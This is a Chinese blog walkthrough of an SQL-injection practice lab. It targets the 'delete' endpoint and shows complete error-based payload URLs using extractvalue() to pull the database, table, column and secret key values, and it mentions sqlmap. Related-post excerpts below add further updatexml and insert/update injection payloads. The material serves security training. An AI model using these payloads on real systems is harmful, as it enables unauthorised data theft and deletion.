SQL注入漏洞测试(delete注入)

最新推荐文章于 2024-05-17 18:04:04 发布
最新推荐文章于 2024-05-17 18:04:04 发布
阅读量2.8k 收藏 2
点赞数
分类专栏: web 文章标签: sql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52718293/article/details/121843859
版权

*首先关于报错型注入可以参考一下*文章了解
delecte注入的多种方法
这题我使用的是extractvalue函数
在这里插入图片描述
从此可以知道注入点在删除页面的url链接的id参数中,可由报错注入来爆库

1.爆库 (pikaqiu)
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select database())))
在这里插入图片描述

2.爆表名(message)
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select group_concat(table_name) from information_schema.tables where table_schema=‘pikaqiu’)))
在这里插入图片描述

3.爆字段名
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select group_concat(column_name) from information_schema.columns where table_name=‘message’)))
在这里插入图片描述
4.爆字段内容
a.由于报错内容回显只能回显32位,而"~"占了一个字符,所以爆出来的key值是少1位的,知道原因后就有很多处理方法了,可以有right()方法

b.由于key是保留字段,要用单引号括住,否则会报错

c.由于这题是请求删除的url,如果之前你请求id为61~65,因为墨者服务器数据库里面存的key的数据在这个范围(但没精确到是哪个),当前面注入成功的时候也会删除对应id的key内容,导致最后出现爆字段key值的时候,很多评论会有key值为空的情况。如果遇到这种情况,可重启环境再爆字段。

and extractvalue(1,concat(’~’,(select group_concat(key) from message)))
在这里插入图片描述
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,right((select group_concat(key) from message),32)))
在这里插入图片描述
方法二:sqlmap
在这里插入图片描述
在这里插入图片描述

*小瑶
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
delete注入
Ethan024的博客
03-30 982
delete注入 实验环境: 皮卡丘平台—delete注入 原理: if(array_key_exists(‘id’, $_GET)){ KaTeX parse error: Expected '}', got 'EOF' at end of input: …ge where id = {$_GET[‘id’]}"; …} 要在’id’出构造闭合 实验步骤: 可以看到此时有一条留言: 删除该留言并且用Burpsuite抓包,并发送到repeater中: 设计payload:1 or updatexml
SQL注入漏洞全接触——高级篇.txt
02-13
看完入门篇和进阶篇后,稍加练习,破解...5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高
delete请求安全风险_Web漏洞|不安全的HTTP方法
weixin_39939530的博客
02-01 2799
我们常见的HTTP请求方法是GET、POST和HEAD。但是,其实除了这两个之外,HTTP还有一些其他的请求方法。WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web ...
关于http的PUT、DELETE等方法到底安不安全的讨论
热门推荐
CHEndorid的博客
12-16 1万+
本文主要记录我们的讨论过程及结论,具体测试代码就不贴了。 一、背景 最近研发让我开一下服务器的put、delete方法,被我以不安全的http方法给拒绝了。 研发表示我很无理,put怎么就是不安全的了,在他看来,put和post只是语义上的不同。如果put是不安全的方法,那么post也是不安全的方法了。 网上的说法也是分为两派,一派说这些都是不安全的方法,要关掉;另一派说它们只是语义上的区别,不存在安不安全。 二、一探究竟 经过我和研发各自编写测试用例来论证后,我明白了为什么会有这样的分歧:我是
4、delete注入
最新发布
weixin_51520483的博客
05-17 272
1、在某些传递不了参数,也有存在注入的,要通过抓包的进行注入1、inset、update、delete注入方式跟selec注入方式区别在于,这是一个操作,不是一个联合查 询,所以需要用报错方式或许信息2、当以抓取数据包形式插入payload时,要对插入的payload进行url编码3、在某些情况下,空格也可能被编码为%20。这是因为在某些URL编码标准中,符号也被视为特殊字符,因此为了避免混淆,有些系统或库可能会选择使用%20来编码空格。
SQL注入】UPDATE、insert、delete注入
07-08 3216
SQL注入
墨者SQL注入漏洞测试(delete注入)
zr1213159840的博客
12-14 430
这题是看了别人的思路才知道的,还是要多加学习呀。 首先是界面点进去后,点击留言发现会留言在界面上,我一直以为这个框子存在注入。结果不是的。 正确的姿势是留言后点击鼠标放在删除按钮上会在左下角出现删除的链接,其实想想也是,写入应该是insert注入才对啊。 那么我们是可以直接在链接上进行测试的 id=1 and 1=1--+ 试试 1=1和1=2测试后,发现是存在注入的,那么我们就从报错开始。 id=1 and (updatexml(1,concat(0x7e,(select database()),0
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库...SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入(时间注入)等...
案例预防SQL注入漏洞函数
10-31
本案例中,提供了几种预防SQL注入漏洞的方法。 首先,我们来看提供的`checkStr`函数,它用于过滤掉可能含有SQL特殊字符的输入。函数内部,`replace`函数被多次调用来替换掉空格 `'`(单引号)、`;`(分号)、`--`...
PHP简单预防sql注入的方法
10-21
SQL注入是一种常见的网络安全威胁,它发生在Web应用程序中,允许攻击者通过输入恶意的SQL代码来操纵或窃取数据库中的数据。PHP是Web开发中广泛使用的脚本语言,因此了解如何防止SQL注入对于保护PHP应用程序至关重要...
think3.2.3_sql注入分析1
08-03
在本文中,我们将深入探讨关于ThinkPHP 3.2.3版本中的SQL注入漏洞,特别是如何利用这个漏洞以及其成因。SQL注入是一种常见的安全漏洞,允许攻击者通过输入恶意SQL代码来操纵数据库,获取、修改或删除敏感数据。 ...
SQL核心语句(insert插入)(delete删除)(update更新)
05-06
适合SQL初学者!适合SQL初学者!适合SQL初学者!适合SQL初学者!
pikachu靶场--SQL inject--insert/update/delete/HTTP header注入/盲注【4.5】~【4.9】
lmei1228的博客
06-11 755
substr(database(),1,1)意思是把database()的结果取值,取从第1个字符开始的第1个字符,再包裹一层ascii(),意思是将取出的字符转换成ASCII码输出,这里我们的数据库名称为apache,所以结果依次为:a ,97。因此,我们可以构造闭合xxx' or updatexml(1,concat(0x7e,database()),0) or' ,这样,返回的报错内容里就有我们所需要的信息。但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的是时间,从而确定注入
几种SQL注入(insert,update,delete,`, \ 等。。。)
qq_42133828的博客
03-23 7936
insert注入: $sql = "insert into user(username,password) values('$username','$password',)"; payload: 适用于字符型: ' or updatexml(1,concat(0x7e,(database())),0) or ' 适用于数字型: ' or extractva...
SQL注入(三):delete+http header
NSQ0207的博客
07-19 123
http header注入 使用 ' 判断哪里存在sql注入 测试,使用 ' ' 发现成功 使用order by 判段是否为select查询,如果不是则使用updatexml admin'orupdatexml(2,concat(0x7e,(version())),0)or'
SQL注入-干货!干货!
rumil的博客
08-20 279
SQL注入小总结~
SQL注入之insert/update/delete注入
情感博主V
02-15 3177
相关函数 UpdateXML(xml_target,xpath_expr,new_xml) #此函数将xml_target中用xpath_expr路径匹配到XML片段用new_xml替换,然后返回更改后的XML。 #xml_target被替换的部分与xpath_expr用户提供的XPath表达式匹配。 #如果找不到表达式匹配 xpath_expr项,或者找到多个匹配项,则该函数返回原始 ml_ta...
insert、update和delete 注入方法
黑面狐
11-28 4965
我们常见的注入都是select的查询注入比较多,但是SQL注入在参数没有检查和过滤的时候就会把恶意的数据插入数据库,从而造成SQL注入。 所有说除了查询之外,所有和数据库进行交互的请求都有可能造成注入。如:插入数据,更改数据,删除数据等,所以现在根据网上的技巧汇总一下insert、update和delete注入方法。 以下均为报错注入,测试数据库版本5.7.21 利用内置函数updatex...
SQL注入 sql_delete_syntax
07-09
SQL注入是一种常见的安全漏洞,攻击者通过在用户输入的数据中插入恶意的SQL代码,从而可以执行未经授权的操作或者获取敏感信息。 在谈论SQL注入时,"sql_delete_syntax"可能指的是SQL语句中的DELETE语法。DELETE语句用于从数据库中删除记录。 以下是一些常见的SQL删除语句的语法示例: 1. 删除整个表中的所有记录: DELETE FROM 表名; 2. 删除满足特定条件的记录: DELETE FROM 表名 WHERE 条件; 3. 删除具有特定主键值的记录: DELETE FROM 表名 WHERE 主键列 = 值; 请注意,这只是SQL删除语句的基本语法示例,并不代表完整的语法。在实际使用时,你需要根据数据库类型和表结构进行相应的调整。 对于防止SQL注入攻击,请使用参数化查询或预编译语句,并避免直接将用户输入拼接到SQL语句中。这样可以有效地防止恶意代码被插入到SQL语句中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值